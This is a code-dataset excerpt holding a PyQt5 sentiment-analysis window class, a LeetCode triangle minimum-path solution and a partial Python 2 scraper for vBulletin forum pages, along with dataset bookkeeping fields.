self.pronoun_checkbox.setObjectName('pronoun_checkbox')\n self.vertical_layout_1.addWidget(self.pronoun_checkbox)\n self.lexical_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.lexical_checkbox.setFont(font)\n self.lexical_checkbox.setObjectName('lexical_checkbox')\n self.vertical_layout_1.addWidget(self.lexical_checkbox)\n self.rule_based_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.rule_based_checkbox.setFont(font)\n self.rule_based_checkbox.setObjectName('rule_based_checkbox')\n self.vertical_layout_1.addWidget(self.rule_based_checkbox)\n self.machine_learning_checkbox = QtWidgets.QCheckBox(self.\n vertical_layout_widget_1)\n self.machine_learning_checkbox.setFont(font)\n self.machine_learning_checkbox.setObjectName(\n 'machine_learning_checkbox')\n self.vertical_layout_1.addWidget(self.machine_learning_checkbox)\n self.help_scroll_box = QtWidgets.QScrollArea(self.main_window)\n self.help_scroll_box.setGeometry(QtCore.QRect(280, 260, 160, 140))\n self.help_scroll_box.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.help_scroll_box.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.help_scroll_box.setWidgetResizable(True)\n self.help_scroll_box.setObjectName('help_scroll_box')\n self.help_content = QtWidgets.QWidget()\n self.help_content.setGeometry(QtCore.QRect(0, 0, 158, 138))\n self.help_content.setObjectName('help_content')\n self.help_scroll_box.setWidget(self.help_content)\n self.selected_files = {}\n self.input_output_box.setCurrentIndex(0)\n self.retranslateUI()\n QtCore.QMetaObject.connectSlotsByName(self.main_window)\n\n def retranslateUI(self):\n _translate = QtCore.QCoreApplication.translate\n self.main_window.setWindowTitle(_translate('main_window',\n 'SentiCompare'))\n self.add_button.setText(_translate('main_window', 'Add'))\n self.delete_button.setText(_translate('main_window', 'Delete'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .select_files_tab), _translate('main_window', 'Select Files'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .manual_input_tab), _translate('main_window', 'Manual Input'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .results_tab), _translate('main_window', 'Results'))\n self.run_button.setText(_translate('main_window', 'Run'))\n self.quit_button.setText(_translate('main_window', 'Quit'))\n self.pronoun_checkbox.setText(_translate('main_window',\n 'Pronoun Usage'))\n self.lexical_checkbox.setText(_translate('main_window', 'Lexical'))\n self.rule_based_checkbox.setText(_translate('main_window',\n 'Rule Based'))\n self.machine_learning_checkbox.setText(_translate('main_window',\n 'Machine Learning'))\n self.branding_label.setText(_translate('main_window', 'SentiCompare'))\n\n def showWindow(self):\n self.main_window.show()\n\n def selectFiles(self):\n file_dialog = FileDialog(self.main_window)\n file_dialog.setFilters(['Text files (*.txt)'])\n file_dialog.setDefaultFilterIndex = 0\n file_dialog.setDefaultDirectory(os.path.expanduser('~'))\n file_dialog.exec()\n if file_dialog.getPath() == '':\n return\n elif file_dialog.getFilename()[2] == '':\n for file in os.listdir(file_dialog.getPath()):\n if file.endswith('.txt') and not file.startswith('.'):\n file_path = os.path.join(file_dialog.getPath(), file)\n if file_path not in self.selected_files:\n self.selected_files[file] = file_path\n item = QStandardItem(file)\n item.setCheckable(True)\n self.file_view_model.appendRow(item)\n elif file_dialog.getPath() not in self.selected_files:\n self.selected_files[file_dialog.getFilename()[1]\n ] = file_dialog.getPath()\n item = QStandardItem(file_dialog.getFilename()[1])\n item.setCheckable(True)\n self.file_view_model.appendRow(item)\n\n def removeFiles(self):\n for i in range(self.file_view_model.rowCount() - 1, -1, -1):\n if self.file_view_model.item(i).checkState():\n filename = self.file_view_model.item(i).text()\n del self.selected_files[filename]\n self.file_view_model.removeRow(i)\n\n def run(self):\n if not (self.pronoun_checkbox.isChecked() or self.lexical_checkbox.\n isChecked() or self.rule_based_checkbox.isChecked() or self.\n machine_learning_checkbox.isChecked()):\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle('Missing Parameters')\n message_box.setText(\n \"You haven't selected any methods of sentiment analysis. Please select at least one \"\n + 'method from the list of options.')\n message_box.exec_()\n return\n if self.input_output_box.currentIndex() == 2:\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle('Select Input')\n message_box.setText(\n 'You must be on the \"Select Files\" page or the \"Manual Input\" page to run '\n +\n 'an analysis. Please select one of those pages and try again.')\n message_box.exec_()\n return\n else:\n progress_bar = QtWidgets.QProgressDialog(\n 'Running Sentiment Analysis...', 'Cancel', 0, 100, self.\n main_window)\n progress_bar.setValue(0)\n progress_bar.setCancelButton(None)\n progress_bar.setWindowModality(QtCore.Qt.WindowModal)\n progress_bar.resize(400, 50)\n progress_bar.show()\n if self.input_output_box.currentIndex() == 0:\n sentiment_analyzer = SentimentAnalyzer(self.selected_files,\n progress_bar, pronoun=self.pronoun_checkbox.isChecked(),\n lexical=self.lexical_checkbox.isChecked(), rule_based=\n self.rule_based_checkbox.isChecked(), machine_learning=\n self.machine_learning_checkbox.isChecked())\n else:\n sentiment_analyzer = SentimentAnalyzer(self.text_input.\n toPlainText(), progress_bar, pronoun=self.\n pronoun_checkbox.isChecked(), lexical=self.\n lexical_checkbox.isChecked(), rule_based=self.\n rule_based_checkbox.isChecked(), machine_learning=self.\n machine_learning_checkbox.isChecked())\n results = sentiment_analyzer.runAnalyses()\n progress_bar.close()\n if results:\n self.results_content_text.setText(results)\n self.input_output_box.setTabEnabled(2, True)\n self.input_output_box.setCurrentIndex(2)\n else:\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle('Missing Input')\n message_box.setText(\n \"You haven't added any input to analyze. Please select one or more files or \"\n + 'input some data manually.')\n message_box.exec_()\n return\n",
"step-5": "# ================================================== #\n# MAIN WINDOW #\n# ================================================== #\n# Author: Brady Hammond #\n# Created: 11/21/2017 #\n# Last Edited: N/A #\n# Last Edited By: N/A #\n# ================================================== #\n# FILE SETUP #\n# ================================================== #\n\n\n# Import statements\nimport os\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtGui import QStandardItem, QStandardItemModel\nfrom PyQt5.QtWidgets import QMessageBox\nfrom src import FileDialog, SentimentAnalyzer\n\n\n# ================================================== #\n# CLASS DEFINITION #\n# ================================================== #\n\n\n# UIMainWindow class definition\nclass UIMainWindow(object):\n\n # Define __init__ function\n def __init__(self):\n # Create main window\n font = QtGui.QFont()\n font.setFamily(\"Myriad Pro\")\n font.setPointSize(14)\n self.main_window = QtWidgets.QWidget()\n self.main_window.setFont(font)\n self.main_window.setObjectName(\"main_window\")\n self.main_window.setWindowModality(QtCore.Qt.WindowModal)\n self.main_window.resize(450, 460)\n size_policy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\n size_policy.setHorizontalStretch(0)\n size_policy.setVerticalStretch(0)\n size_policy.setHeightForWidth(self.main_window.sizePolicy().hasHeightForWidth())\n self.main_window.setSizePolicy(size_policy)\n self.main_window.setMinimumSize(QtCore.QSize(450, 460))\n self.main_window.setMaximumSize(QtCore.QSize(450, 460))\n self.main_window.setBaseSize(QtCore.QSize(450, 460))\n\n # Create branding icon\n self.branding_icon = QtWidgets.QLabel(self.main_window)\n self.branding_icon.setGeometry(QtCore.QRect(20, 5, 90, 90))\n self.branding_icon.setText(\"\")\n self.branding_icon.setPixmap(QtGui.QPixmap(\"../images/senticompare_logo.png\"))\n self.branding_icon.setAlignment(QtCore.Qt.AlignJustify | QtCore.Qt.AlignVCenter)\n self.branding_icon.setObjectName(\"branding_icon\")\n\n # Create branding label\n self.branding_label = QtWidgets.QLabel(self.main_window)\n self.branding_label.setGeometry(QtCore.QRect(110, 5, 330, 90))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(81, 108, 146))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)\n brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(81, 108, 146))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)\n brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)\n brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)\n self.branding_label.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily(\"Optima\")\n font.setPointSize(50)\n self.branding_label.setFont(font)\n self.branding_label.setObjectName(\"branding_label\")\n\n # Create first horizontal layout\n self.horizontal_layout_widget_1 = QtWidgets.QWidget(self.main_window)\n self.horizontal_layout_widget_1.setGeometry(QtCore.QRect(10, 410, 430, 50))\n self.horizontal_layout_widget_1.setObjectName(\"horizontal_layout_widget_1\")\n self.horizontal_layout_1 = QtWidgets.QHBoxLayout(self.horizontal_layout_widget_1)\n self.horizontal_layout_1.setContentsMargins(0, 0, 0, 0)\n self.horizontal_layout_1.setObjectName(\"horizontal_layout_1\")\n\n # Create run button\n self.run_button = QtWidgets.QPushButton(self.horizontal_layout_widget_1)\n self.run_button.setObjectName(\"run_button\")\n self.run_button.clicked.connect(self.run)\n\n # Add run button to first horizontal layout\n self.horizontal_layout_1.addWidget(self.run_button)\n\n # Create quit button\n self.quit_button = QtWidgets.QPushButton(self.horizontal_layout_widget_1)\n self.quit_button.setObjectName(\"quit_button\")\n self.quit_button.clicked.connect(self.main_window.close)\n\n # Add quit button to first horizontal layout\n self.horizontal_layout_1.addWidget(self.quit_button)\n\n # Create file selection tab\n self.select_files_tab = QtWidgets.QWidget()\n self.select_files_tab.setObjectName(\"select_files_tab\")\n\n # Create second horizontal layout\n self.horizontal_layout_widget_2 = QtWidgets.QWidget(self.select_files_tab)\n self.horizontal_layout_widget_2.setGeometry(QtCore.QRect(10, 230, 230, 50))\n self.horizontal_layout_widget_2.setObjectName(\"horizontal_layout_widget_2\")\n self.horizontal_layout_2 = QtWidgets.QHBoxLayout(self.horizontal_layout_widget_2)\n self.horizontal_layout_2.setContentsMargins(0, 0, 0, 0)\n self.horizontal_layout_2.setObjectName(\"horizontal_layout_2\")\n\n # Create input/output tab window\n font.setFamily(\"Myriad Pro\")\n font.setPointSize(12)\n self.input_output_box = QtWidgets.QTabWidget(self.main_window)\n self.input_output_box.setGeometry(QtCore.QRect(10, 100, 260, 300))\n self.input_output_box.setFont(font)\n self.input_output_box.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))\n self.input_output_box.setTabPosition(QtWidgets.QTabWidget.North)\n self.input_output_box.setTabShape(QtWidgets.QTabWidget.Rounded)\n self.input_output_box.setTabsClosable(False)\n self.input_output_box.setObjectName(\"input_output_box\")\n\n # Create file view\n self.file_view = QtWidgets.QListView(self.select_files_tab)\n self.file_view.setGeometry(QtCore.QRect(10, 10, 235, 210))\n self.file_view.setObjectName(\"file_view\")\n\n # Create file view model\n self.file_view_model = QStandardItemModel(self.file_view)\n\n # Add file view model to file view\n self.file_view.setModel(self.file_view_model)\n\n # Show file view\n self.file_view.show()\n\n # Add file selection tab to input/output tab window\n self.input_output_box.addTab(self.select_files_tab, \"\")\n\n # Create add button\n self.add_button = QtWidgets.QPushButton(self.horizontal_layout_widget_2)\n self.add_button.setFont(font)\n self.add_button.setObjectName(\"add_button\")\n self.add_button.clicked.connect(self.selectFiles)\n\n # Add add button to second horizontal layout\n self.horizontal_layout_2.addWidget(self.add_button)\n\n # Create delete button\n self.delete_button = QtWidgets.QPushButton(self.horizontal_layout_widget_2)\n self.delete_button.setFont(font)\n self.delete_button.setObjectName(\"delete_button\")\n self.delete_button.clicked.connect(self.removeFiles)\n\n # Add delete button to second horizontal layout\n self.horizontal_layout_2.addWidget(self.delete_button)\n\n # Create manual input tab\n self.manual_input_tab = QtWidgets.QWidget()\n self.manual_input_tab.setObjectName(\"manual_input_tab\")\n\n # Create text input\n self.text_input = QtWidgets.QTextEdit(self.manual_input_tab)\n self.text_input.setGeometry(QtCore.QRect(10, 10, 235, 250))\n self.text_input.setObjectName(\"text_input\")\n\n # Add text input to manual input tab\n self.input_output_box.addTab(self.manual_input_tab, \"\")\n\n # Create results tab\n self.results_tab = QtWidgets.QWidget()\n self.results_tab.setObjectName(\"results_tab\")\n\n # Create results scroll box\n self.results_scroll_box = QtWidgets.QScrollArea(self.results_tab)\n self.results_scroll_box.setGeometry(QtCore.QRect(10, 10, 235, 250))\n self.results_scroll_box.setWidgetResizable(True)\n self.results_scroll_box.setObjectName(\"results_scroll_box\")\n\n # Create results content\n self.results_content = QtWidgets.QWidget()\n self.results_content.setGeometry(QtCore.QRect(0, 0, 230, 250))\n self.results_content.setObjectName(\"results_content\")\n self.results_scroll_box.setWidget(self.results_content)\n\n # Create results content text\n self.results_content_text = QtWidgets.QTextEdit(self.results_content)\n self.results_content_text.setGeometry(QtCore.QRect(-1, -1, 235, 250))\n self.results_content_text.setReadOnly(True)\n self.results_content_text.setObjectName(\"results_content_text\")\n\n # Add results tab to input/output tab window\n self.input_output_box.addTab(self.results_tab, \"\")\n\n # Disable results tab\n self.input_output_box.setTabEnabled(2, False)\n\n # Create first group box\n font.setPointSize(14)\n self.group_box_1 = QtWidgets.QGroupBox(self.main_window)\n self.group_box_1.setGeometry(QtCore.QRect(280, 110, 160, 140))\n self.group_box_1.setFont(font)\n self.group_box_1.setTitle(\"\")\n self.group_box_1.setAlignment(QtCore.Qt.AlignCenter)\n self.group_box_1.setFlat(False)\n self.group_box_1.setCheckable(False)\n self.group_box_1.setObjectName(\"group_box_1\")\n\n # Create first vertical layout\n self.vertical_layout_widget_1 = QtWidgets.QWidget(self.group_box_1)\n self.vertical_layout_widget_1.setGeometry(QtCore.QRect(9, 0, 141, 141))\n self.vertical_layout_widget_1.setObjectName(\"vertical_layout_widget_1\")\n self.vertical_layout_1 = QtWidgets.QVBoxLayout(self.vertical_layout_widget_1)\n self.vertical_layout_1.setContentsMargins(0, 0, 0, 0)\n self.vertical_layout_1.setObjectName(\"vertical_layout_1\")\n\n # Create pronoun checkbox\n self.pronoun_checkbox = QtWidgets.QCheckBox(self.vertical_layout_widget_1)\n self.pronoun_checkbox.setFont(font)\n self.pronoun_checkbox.setObjectName(\"pronoun_checkbox\")\n\n # Add pronoun checkbox to first vertical layout\n self.vertical_layout_1.addWidget(self.pronoun_checkbox)\n\n # Create lexical checkbox\n self.lexical_checkbox = QtWidgets.QCheckBox(self.vertical_layout_widget_1)\n self.lexical_checkbox.setFont(font)\n self.lexical_checkbox.setObjectName(\"lexical_checkbox\")\n\n # Add lexical checkbox to first vertical layout\n self.vertical_layout_1.addWidget(self.lexical_checkbox)\n\n # Create rule based checkbox\n self.rule_based_checkbox = QtWidgets.QCheckBox(self.vertical_layout_widget_1)\n self.rule_based_checkbox.setFont(font)\n self.rule_based_checkbox.setObjectName(\"rule_based_checkbox\")\n\n # Add rule_based checkbox to first vertical layout\n self.vertical_layout_1.addWidget(self.rule_based_checkbox)\n\n # Create machine learning checkbox\n self.machine_learning_checkbox = QtWidgets.QCheckBox(self.vertical_layout_widget_1)\n self.machine_learning_checkbox.setFont(font)\n self.machine_learning_checkbox.setObjectName(\"machine_learning_checkbox\")\n\n # Add machine learning checkbox to first vertical layout\n self.vertical_layout_1.addWidget(self.machine_learning_checkbox)\n\n # Create help scroll box\n self.help_scroll_box = QtWidgets.QScrollArea(self.main_window)\n self.help_scroll_box.setGeometry(QtCore.QRect(280, 260, 160, 140))\n self.help_scroll_box.setFrameShape(QtWidgets.QFrame.StyledPanel)\n self.help_scroll_box.setFrameShadow(QtWidgets.QFrame.Sunken)\n self.help_scroll_box.setWidgetResizable(True)\n self.help_scroll_box.setObjectName(\"help_scroll_box\")\n\n # Create help content\n self.help_content = QtWidgets.QWidget()\n self.help_content.setGeometry(QtCore.QRect(0, 0, 158, 138))\n self.help_content.setObjectName(\"help_content\")\n self.help_scroll_box.setWidget(self.help_content)\n\n # Create selected files variable\n self.selected_files = {}\n\n # Set current tab\n self.input_output_box.setCurrentIndex(0)\n\n # Retranslate UI\n self.retranslateUI()\n\n # Connect UI slots\n QtCore.QMetaObject.connectSlotsByName(self.main_window)\n\n # ============================================== #\n\n # Define retranslateUI function\n def retranslateUI(self):\n # Add text to ui elements\n _translate = QtCore.QCoreApplication.translate\n self.main_window.setWindowTitle(_translate(\"main_window\", \"SentiCompare\"))\n self.add_button.setText(_translate(\"main_window\", \"Add\"))\n self.delete_button.setText(_translate(\"main_window\", \"Delete\"))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self.select_files_tab),\n _translate(\"main_window\", \"Select Files\"))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self.manual_input_tab),\n _translate(\"main_window\", \"Manual Input\"))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self.results_tab),\n _translate(\"main_window\", \"Results\"))\n self.run_button.setText(_translate(\"main_window\", \"Run\"))\n self.quit_button.setText(_translate(\"main_window\", \"Quit\"))\n self.pronoun_checkbox.setText(_translate(\"main_window\", \"Pronoun Usage\"))\n self.lexical_checkbox.setText(_translate(\"main_window\", \"Lexical\"))\n self.rule_based_checkbox.setText(_translate(\"main_window\", \"Rule Based\"))\n self.machine_learning_checkbox.setText(_translate(\"main_window\", \"Machine Learning\"))\n self.branding_label.setText(_translate(\"main_window\", \"SentiCompare\"))\n\n # ============================================== #\n\n # Define showWindow function\n def showWindow(self):\n self.main_window.show()\n\n # ============================================== #\n\n # Define selectFiles function\n def selectFiles(self):\n # Create file dialog\n file_dialog = FileDialog(self.main_window)\n file_dialog.setFilters([\"Text files (*.txt)\"])\n file_dialog.setDefaultFilterIndex = 0\n file_dialog.setDefaultDirectory(os.path.expanduser('~'))\n file_dialog.exec()\n\n # Return if nothing was selected\n if file_dialog.getPath() == '':\n return\n\n # Add files from selected directory to file list\n elif file_dialog.getFilename()[2] == '':\n for file in os.listdir(file_dialog.getPath()):\n if file.endswith('.txt') and not file.startswith('.'):\n file_path = os.path.join(file_dialog.getPath(), file)\n\n if file_path not in self.selected_files:\n self.selected_files[file] = file_path\n\n item = QStandardItem(file)\n item.setCheckable(True)\n self.file_view_model.appendRow(item)\n\n # Add selected file to list\n else:\n if file_dialog.getPath() not in self.selected_files:\n self.selected_files[file_dialog.getFilename()[1]] = file_dialog.getPath()\n\n item = QStandardItem(file_dialog.getFilename()[1])\n item.setCheckable(True)\n self.file_view_model.appendRow(item)\n\n # ============================================== #\n\n # Define removeFiles function\n def removeFiles(self):\n # Remove all checked files\n for i in range(self.file_view_model.rowCount() - 1, -1, -1):\n if self.file_view_model.item(i).checkState():\n filename = self.file_view_model.item(i).text()\n del self.selected_files[filename]\n self.file_view_model.removeRow(i)\n\n # ============================================== #\n\n # Define run function\n def run(self):\n # Check if an analysis method is selected\n if not (self.pronoun_checkbox.isChecked() or self.lexical_checkbox.isChecked() or\n self.rule_based_checkbox.isChecked() or self.machine_learning_checkbox.isChecked()):\n # Create and show an error message\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle(\"Missing Parameters\")\n message_box.setText(\"You haven't selected any methods of sentiment analysis. Please select at least one \" +\n \"method from the list of options.\")\n message_box.exec_()\n return\n\n # Check if the current tab is valid\n if self.input_output_box.currentIndex() == 2:\n # Create and show error message\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle(\"Select Input\")\n message_box.setText(\"You must be on the \\\"Select Files\\\" page or the \\\"Manual Input\\\" page to run \" +\n \"an analysis. Please select one of those pages and try again.\")\n message_box.exec_()\n return\n\n else:\n progress_bar = QtWidgets.QProgressDialog(\"Running Sentiment Analysis...\", \"Cancel\", 0, 100, self.main_window)\n progress_bar.setValue(0)\n progress_bar.setCancelButton(None)\n progress_bar.setWindowModality(QtCore.Qt.WindowModal)\n progress_bar.resize(400, 50)\n progress_bar.show()\n\n # Analyze selected files\n if self.input_output_box.currentIndex() == 0:\n sentiment_analyzer = SentimentAnalyzer(self.selected_files, progress_bar, pronoun=self.pronoun_checkbox.isChecked(),\n lexical=self.lexical_checkbox.isChecked(),\n rule_based=self.rule_based_checkbox.isChecked(),\n machine_learning=self.machine_learning_checkbox.isChecked())\n\n # Analyze manual input\n else:\n sentiment_analyzer = SentimentAnalyzer(self.text_input.toPlainText(), progress_bar, pronoun=self.pronoun_checkbox.isChecked(),\n lexical=self.lexical_checkbox.isChecked(),\n rule_based=self.rule_based_checkbox.isChecked(),\n machine_learning=self.machine_learning_checkbox.isChecked())\n\n results = sentiment_analyzer.runAnalyses()\n progress_bar.close()\n\n if results:\n self.results_content_text.setText(results)\n self.input_output_box.setTabEnabled(2, True)\n self.input_output_box.setCurrentIndex(2)\n\n else:\n message_box = QMessageBox()\n message_box.setIcon(QMessageBox.Warning)\n message_box.setWindowTitle(\"Missing Input\")\n message_box.setText(\"You haven't added any input to analyze. Please select one or more files or \" +\n \"input some data manually.\")\n message_box.exec_()\n return\n\n# ================================================== #\n# EOF #\n# ================================================== #\n",
"step-ids": [
4,
6,
7,
8,
9
]
}
|
[
4,
6,
7,
8,
9
] |
class Solution(object):
def minimumTotal(self, triangle):
"""
:type triangle: List[List[int]]
:rtype: int
"""
t = triangle
if len(t) == 1:
return t[0][0]
ret = [0] * len(t)
ret[0] = t[0][0]
for i in range(1, len(t)):
for j in range(0, i + 1):
if j == 0:
old_v = ret[j]
ret[j] += t[i][j]
elif j == i:
ret[j] = old_v + t[i][j]
else:
val = min(old_v + t[i][j], ret[j] + t[i][j])
old_v = ret[j]
ret[j] = val
return min(ret)
|
normal
|
{
"blob_id": "84515ef6879b54b333f9afd48c6c4b7c43ff6957",
"index": 1068,
"step-1": "<mask token>\n",
"step-2": "class Solution(object):\n <mask token>\n",
"step-3": "class Solution(object):\n\n def minimumTotal(self, triangle):\n \"\"\"\n :type triangle: List[List[int]]\n :rtype: int\n \"\"\"\n t = triangle\n if len(t) == 1:\n return t[0][0]\n ret = [0] * len(t)\n ret[0] = t[0][0]\n for i in range(1, len(t)):\n for j in range(0, i + 1):\n if j == 0:\n old_v = ret[j]\n ret[j] += t[i][j]\n elif j == i:\n ret[j] = old_v + t[i][j]\n else:\n val = min(old_v + t[i][j], ret[j] + t[i][j])\n old_v = ret[j]\n ret[j] = val\n return min(ret)\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
"""This file parses vbulletin forums"""
import re
import logging
from BeautifulSoup import BeautifulSoup as bs
import imaget
import pdb
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
date_marker = ["<!-- status icon and date -->", "<!-- / status icon and date -->"]
message_marker = ["<!-- message -->", "<!-- / message -->"]
sig_marker = ["<!-- sig -->", "<!-- / sig -->"]
edit_marker = ["<!-- edit note -->", "<!-- / edit note -->"]
def get_subforums(main_soup):
subforums = main_soup.findAll('td', attrs={'class':'alt1Active'})
sublinks = []
for s in subforums:
links = s.findAll('a')
for a in links:
if not "http" in a['href']:
break
link = a['href']
text = a.getText()
sublinks.append({'name':text, 'link':link})
return sublinks
def get_threads(subforum_soup):
"""This function gets information on the threads from the subforum page. It also returns the total number of pages"""
threads = subforum_soup.findAll('a', attrs={'id':lambda x:x and x.startswith('thread_title')}) #pulls out the thread links
#page _ of _
page = 1
page_count = subforum_soup.find('td', attrs={'class':'vbmenu_control'})
if page_count:
page_count = page_count.getText()
page_match = re.search(r'(\d+) .+? (\d+)', page_count)
if page_match:
page_count = int(page_match.group(2))
page = int(page_match.group(1))
logger.debug("get_threads: page_count = %d, page = %d" % (page_count, page))
else:
page_count = 1
page = 1
thread_counts = subforum_soup.findAll('td', attrs={'class':'alt2', 'title':lambda x:x and re.match(r'.+?: \d+?', x)})
if len(threads) != len(thread_counts):
logger.error('get_threads: thread-count mismatch. Threads = %d; thread_counts = %d' % (len(threads), len(thread_counts)))
logger.debug('get_threads: threads = %s' % str(threads))
logger.debug('get_threads: thread_counts = %s' % str(thread_counts))
threadlinks = []
for i in range(min(len(threads), len(thread_counts))):
t = threads[i]
c = thread_counts[i]
sanatized = c['title'].replace(',', '')
count = int(re.search(r'.+?: (\d+?) .+?: (\d+?)',sanatized).group(1)) + 1
text = t.getText()
link = t['href']
threadlinks.append({'name':text, 'link':link, 'count':count})
return threadlinks, (page, page_count)
def get_page(thread_url, pagenum):
return thread_url + "&page=" + str(pagenum)
def get_posts(page_soup):
page_soup = bs(page_soup)
#page _ of _
page_count = page_soup.find('td', attrs={'class':'vbmenu_control'})
if page_count:
page_count = page_count.getText()
page_match = re.search(r'(\d+) .+? (\d+)', page_count)
if page_match:
page_count = int(page_match.group(2))
page = int(page_match.group(1))
else:
page_count = 1
page = 1
posts = page_soup.findAll('table', attrs={'id':lambda x: x and re.match(r'post', x)})
logging.info('get_post: got %d posts' % len(posts))
post_list = []
for p in posts:
post_link = p.find('a', attrs={'name': lambda x: x and re.match(r'\d+', x)})['href']
post_string = str(p)
raw_message = extract(post_string, message_marker[0], message_marker[1])
date = extract(post_string, date_marker[0], date_marker[1])
date = strip_tags(date).strip()
message = get_message(raw_message)
sig = extract(post_string, sig_marker[0], sig_marker[1])
edit = extract(post_string, edit_marker[0], edit_marker[1])
msg_image_srcs = imaget.get_image_src(raw_message)
if msg_image_srcs: msg_image_srcs = msg_image_srcs[0]
print "message source: "
print msg_image_srcs
print "\n\n\n"
user = get_user(post_string, sig)
post_list.append({'date': date, 'message': message, 'edit': edit, 'message images': msg_image_srcs, 'user': user, 'link': post_link})
return post_list, (page, page_count)
def get_user(post_string, sig = ""):
user_tag = bs(post_string).find('td', attrs={'class':'alt2'})
user_link = user_tag.find('a', attrs={'class':'bigusername'})
if not user_link: return {'tag': user_tag, 'name': 'guest', 'link': None, 'join': None, 'sig': None, 'image': None, 'title': 'guest'}
user_name = user_link.getText()
user_link = user_link['href']
user_title = user_tag.findAll('div')[1].getText()
user_div = user_tag.findAll('div')
inner_ind = 2
while len(user_div[inner_ind].findAll('div'))<3:
inner_ind+=1
inner_name_soup = user_div[inner_ind].findAll('div')
join_date = inner_name_soup[0].getText()[len("Join Date: "):]
user_image_src = imaget.get_image_src(user_tag, 1)
return {'tag': user_tag, 'name':user_name, 'link': user_link, 'title': user_title, 'join': join_date, 'sig': sig, 'image': user_image_src}
def get_message(message_str):
message_soup = bs(message_str)
images = message_soup.findAll('img')
for item in images:
item.extract()
scripts = message_soup.findAll('script')
for item in scripts:
item.extract()
return str(message_soup)
def extract(string, start_marker, end_marker):
"""wrapper function for slicing into a string"""
start_loc = string.find(start_marker)
end_loc = string.find(end_marker)
if start_loc == -1 or end_loc == -1:
return ""
return string[start_loc+len(start_marker):end_loc]
def strip_tags(source):
return re.sub(r'<.+?>', '', source)
|
normal
|
{
"blob_id": "0846f73482ad86158c3f4e37713d6d965e21d796",
"index": 2671,
"step-1": "\"\"\"This file parses vbulletin forums\"\"\"\n\nimport re\nimport logging\nfrom BeautifulSoup import BeautifulSoup as bs\nimport imaget\nimport pdb\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\ndate_marker = [\"<!-- status icon and date -->\", \"<!-- / status icon and date -->\"]\nmessage_marker = [\"<!-- message -->\", \"<!-- / message -->\"]\nsig_marker = [\"<!-- sig -->\", \"<!-- / sig -->\"]\nedit_marker = [\"<!-- edit note -->\", \"<!-- / edit note -->\"]\n\n\n\ndef get_subforums(main_soup):\n\n subforums = main_soup.findAll('td', attrs={'class':'alt1Active'})\n sublinks = []\n for s in subforums:\n links = s.findAll('a')\n for a in links:\n if not \"http\" in a['href']:\n break\n link = a['href']\n text = a.getText()\n sublinks.append({'name':text, 'link':link})\n\n return sublinks\n\n\ndef get_threads(subforum_soup):\n \"\"\"This function gets information on the threads from the subforum page. It also returns the total number of pages\"\"\"\n threads = subforum_soup.findAll('a', attrs={'id':lambda x:x and x.startswith('thread_title')}) #pulls out the thread links\n\n #page _ of _\n page = 1\n page_count = subforum_soup.find('td', attrs={'class':'vbmenu_control'})\n if page_count:\n page_count = page_count.getText()\n page_match = re.search(r'(\\d+) .+? (\\d+)', page_count)\n if page_match:\n page_count = int(page_match.group(2))\n page = int(page_match.group(1))\n logger.debug(\"get_threads: page_count = %d, page = %d\" % (page_count, page))\n else:\n page_count = 1\n page = 1\n\n thread_counts = subforum_soup.findAll('td', attrs={'class':'alt2', 'title':lambda x:x and re.match(r'.+?: \\d+?', x)})\n if len(threads) != len(thread_counts):\n logger.error('get_threads: thread-count mismatch. Threads = %d; thread_counts = %d' % (len(threads), len(thread_counts)))\n logger.debug('get_threads: threads = %s' % str(threads))\n\tlogger.debug('get_threads: thread_counts = %s' % str(thread_counts))\n threadlinks = []\n for i in range(min(len(threads), len(thread_counts))):\n t = threads[i]\n c = thread_counts[i]\n sanatized = c['title'].replace(',', '')\n count = int(re.search(r'.+?: (\\d+?) .+?: (\\d+?)',sanatized).group(1)) + 1\n text = t.getText()\n link = t['href']\n threadlinks.append({'name':text, 'link':link, 'count':count})\n return threadlinks, (page, page_count)\n\ndef get_page(thread_url, pagenum):\n return thread_url + \"&page=\" + 